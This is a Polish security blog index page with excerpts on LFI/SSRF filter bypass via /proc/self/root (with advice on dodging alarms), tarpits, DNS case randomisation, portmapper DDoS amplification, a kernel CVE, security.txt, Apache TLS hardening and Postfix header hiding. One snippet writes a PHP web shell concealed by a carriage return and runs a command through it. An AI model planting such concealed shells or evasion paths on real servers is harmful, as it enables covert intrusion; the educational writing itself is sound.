J

eśli znaleźliśmy podatność LFI lub SSRF i chcemy odczytać plik /etc/passwd, ale serwer filtruje wszystko, co zaczyna się od /etc możemy spróbować zrobić to za pomocą wirtualnego systemu plików proc, czyli: /proc/self/root/etc/passwd (chcąć pominąć filtry, aby nie wyzwolić ustawionych alarmów lepiej unikać frazy /etc/passwd i wykorzystać np. plik: /proc/self/root/etc/timezone lub inny). Natomiast, jeśli polecenie jest wykonywane w kontekście powłoki bash możemy wykorzystać obfuskację (ang. obfuscation), czyli zaciemnienie, które i tak zostanie zinterpretowane przez powłokę:
[ czytaj całość… ]

B

rezent (ang. tarpit), czyli płachta na usługę. Jest usługą sieciową, która celowo wprowadza opóźnienia w obsługiwanym protokole spowalniając w ten sposób klientów i zmuszając ich do oczekiwania przez określony czas. Zachowanie to spowalnia lub zatrzymuje sondowanie i atakowanie systemów / usług. Skanery, skrypty i inne narzędzia atakującego są związywane z konkretną usługą / portem i nie mają możliwości ruszyć dalej (zazwyczaj działają synchronicznie wykonując pracę host po hoście / port po porcie). Nakłada to na atakującego większy koszt pod względem czasu i zasobów niż ponosi go obrońca.
[ czytaj całość… ]

D

zień jak codzień spoglądamy na dashboard z top zapytań DNS, aby widzieć jakie zapytania są kierowane z i do naszych serwerów. W zależności od używanych resolverów lub sposobu zbierania danych o zapytaniach DNS nagle możemy zacząć zastanawiać się, dlaczego niektóre nazwy zapytań wyglądają na zniekształcone. Kto normalny pyta o NfSeC.pL? Z pewnością jakiś skryptowy dzieciak się czymś bawi. Ale chwila tych domen jest znacznie więcej. Więc co tu się dzieje? Nowa forma ataku na DNS?
[ czytaj całość… ]

R

PC Portmapper (znany również jako: portmap lub rpcbind) jest usługą typu Open Network Computing Remote Procedure Call (ONC RPC) zaprojektowaną do mapowania numerów usług RPC na numery portów sieciowych. Procesy RPC powiadamiają rcpbind, gdy startują rejestrując porty na których będą nasłuchiwać. To samo tyczy się ich numerów programów, które mają obsługiwać. Wówczas usługa rpcbind przekierowuje klienta do właściwego numeru portu, aby mógł komunikować się z żądanym serwisem. 3 lata temu usługa ta została wykorzystana do wzmacniania rozproszonych ataków DoS. Gdy portmapper jest odpytywany rozmiar odpowiedzi jest zależny od ilości usług RPC obecnych na hoście. W 2015 roku badacze z firmy Level 3 w swoich eksperymentach uzyskali odpowiedzi na poziomie od 486 bajtów (współczynnik wzmocnienia 7.1) do 1930 bajtów (ww = 28.4) dla 68-bajtowego zapytania. Średni rozmiar wzmocnienia w przeprowadzonych testach wynosił 1241 bajtów (ww = 18.3), podczas gdy w rzeczywistych atakach DDoS zaobserwowana wartość wynosiła 1348 bajtów, co daje wzmocnienie na poziomie 19.8 raza.
[ czytaj całość… ]

$ sudo echo -e "<?=\`\$_POST[1]\`?>\r<?='PHP Test';?>" > test.php
$ cat test.php
<?='PHP Test';?>
$ curl localhost/test.php -d 1=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
PHP Test

D

omowa sieć WiFi to nasze święte miejsce. Nasz skromny kawałek cyberprzestrzeni. Tam podłączamy nasze telefony, laptopy i inne „inteligentne” urządzenia ze sobą i internetem. Jeszcze nie ma końca dwa tysiące dwudziestego roku, a nasze sieci lokalne zostały zaludnione przez rosnącą liczbę urządzeń. Od inteligentnych telewizorów i odtwarzaczy multimedialnych po asystentów domowych, kamery bezpieczeństwa, lodówki, zamki do drzwi i termostaty – nasze LANy stały się schronieniem dla zaufanych urządzeń osobistych i domowych. Wiele z tych urządzeń oferuje ograniczone lub żadne uwierzytelnianie w celu uzyskania dostępu i kontrolowania swoich usług. Z natury ufają one innym urządzeniom w sieci w taki sam sposób, w jaki z własnej woli ufalibyście komuś, komu pozwoliliście znaleźć się w Waszym domu. Korzystają z takich protokołów, jak Universal Plug and Play (UPnP) i HTTP, aby swobodnie komunikować się między sobą, ale są z natury chronione przed połączeniami przychodzącymi z internetu za pomocą zapory ogniowej routera. Można porównać to do ogrodu otoczonego murem. Niestety wystarczy podążenie za złym linkiem, aby umożliwić atakującemu dostanie się do wewnętrznej sieci i uzyskanie kontroli nad różnego rodzaju urządzeniami.
[ czytaj całość… ]

K

ASAN (The Kernel Address Sanitizer) – wykrywający błędy pamięci dynamicznej w kodzie jądra Linuksa właśnie odkrył nową lukę typu: use-after-free (użycia po zwolnieniu pamięci), która pojawiła się od wczesnych wersji jądra Linux 2.6. KASAN (wraz z innymi środkami do sanityzacji) okazał się dość cenny w wykrywaniu różnych błędów w programowaniu zanim zostaną wykorzystane w rzeczywistym świecie. Tym razem padło na odkrycie: CVE-2019-8912. W kodzie podsystemu sieciowego sockfs wykrył podatność use-after-free, która może doprowadzić do wykonania dowolnego kodu (ang. arbitrary code execution). Problem został zgłoszony w zeszłym tygodniu przez inżyniera Huawei i wkrótce po tym został naprawiony. Wydanie jądra Linuksa w wersji 4.20.11 nie wydaje się jeszcze posiadać tej poprawki, ale wkrótce powinna pojawić się w różnych stabilnych / długoterminowych gałęziach.
[ czytaj całość… ]

B

ezpieczeństwo jest złożonym procesem. Jednak, gdy luki w zabezpieczeniach naszego serwisu / organizacji zostaną wykryte przez niezależnych konsultantów bezpieczeństwa (działających w dobrej wierze) – to często brakuje im kanałów do właściwego zgłoszenia odkrytych luk. W rezultacie błędy w zabezpieczeniach mogą pozostać nie zgłoszone lub zaginąć w ramach przesyłania ich do nieodpowiednich kontaktów. Dlatego Ed Foudil zgłosił standard dla formatu pliku security.txt. Obiekt ten jest prostym plikiem tekstowym (podobnym do pliku robots.txt), który zawiera najważniejsze informacje o tym, z kim się skontaktować lub gdzie szukać informacji związanych z bezpieczeństwem witryny.
[ czytaj całość… ]

P

oniższa konfiguracja (podobnie, jak w przypadku nginx) serwera Apache dla komunikacji po https pozwala na uzyskanie oceny A+ w teście przeprowadzanym przez firmę Qualys SSL Labs. Innymi mechanizmami, które zostały zwarte to: HSTS, DNS CAA, OSCP oraz HTTP2. Stosując poniższą konfigurację należy liczyć się, że może ona nie działać (lub niektóre jej funkcjonalności) z starszymi przeglądarkami i aplikacjami typu Java.

  Protocols http/1.1 h2

  SSLEngine on
  SSLCompression off
  SSLSessionTickets off
  SSLUseStapling on

  SSLCertificateFile /etc/apache2/ssl/root.pem
  SSLCertificateKeyFile /etc/apache2/ssl/server.key
  SSLCertificateChainFile /etc/apache2/ssl/root.pem

  SSLProtocol -All +TLSv1.2
  SSLHonorCipherOrder on
  SSLCipherSuite "HIGH:!aNULL:!MD5:!3DES:!CAMELLIA:!AES128:!AES256-SHA:\
                  !AES256-SHA256:!AES256-GCM-SHA384:!AES256-CCM8:!AES256-CCM:\
                  !DHE-DSS-AES256-SHA:!SRP-DSS-AES-256-CBC-SHA"

  SSLOpenSSLConfCmd DHParameters "/etc/ssl/certs/dhparams4096.pem"
  SSLOpenSSLConfCmd ECDHParameters secp384r1
  SSLOpenSSLConfCmd Curves secp521r1:secp384r1

  Header always append Strict-Transport-Security "max-age=31536000;"

Plik dhparams4096.pem wygenerujemy poleceniem (może to zająć nawet kilkanaście minut):

openssl dhparam -out /etc/ssl/certs/dhparams4096.pem 4096

[ czytaj całość… ]

P

ocztę e-mail kiedyś wysyłało się i odbierało w terminalu. Do dzisiaj czasami korzystam z takich programów jak mutt, czy alpine. Cała taka korespondencja jest wysyłana i odbierane przez serwer SMTP (ang. Simple Mail Transfer Protocol) Postfix. Problem w tym, że w standardowej konfiguracji odbiorca naszych wiadomości będzie w stanie zobaczyć ID naszego użytkownika w systemie:

Received: from stardust.nfsec.pl (unknown [17.197.105.219])
  by firewall.hes.trendmicro.eu (TrendMicro Hosted Email Security) with ESMTPS id 22E82
  for <abuse_the@int3rn3t.pl>; Sun, 10 Feb 2019 11:47:27 +0000 (UTC)
Received: by stardust.nfsec.pl (StarDustMX, from userid 666)
  id DD41460069; Sun, 10 Feb 2019 12:47:26 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
  by stardust.nfsec.pl (StarDustMX) with ESMTP id D60FD60068
  for <abuse_the@int3rn3t.pl>; Sun, 10 Feb 2019 12:47:26 +0100 (CET)

To samo tyczy się adresów IP komputerów w sieci wewnętrznej LAN, które mogą korzystać z takiego centralnego serwera pocztowego, czy też przypadku ukrywania się za CloudFlare, kiedy to musi zostać stworzony oddzielny serwer e-mail, aby oryginalny adres IP serwera web pozostał w ukryciu.
[ czytaj całość… ]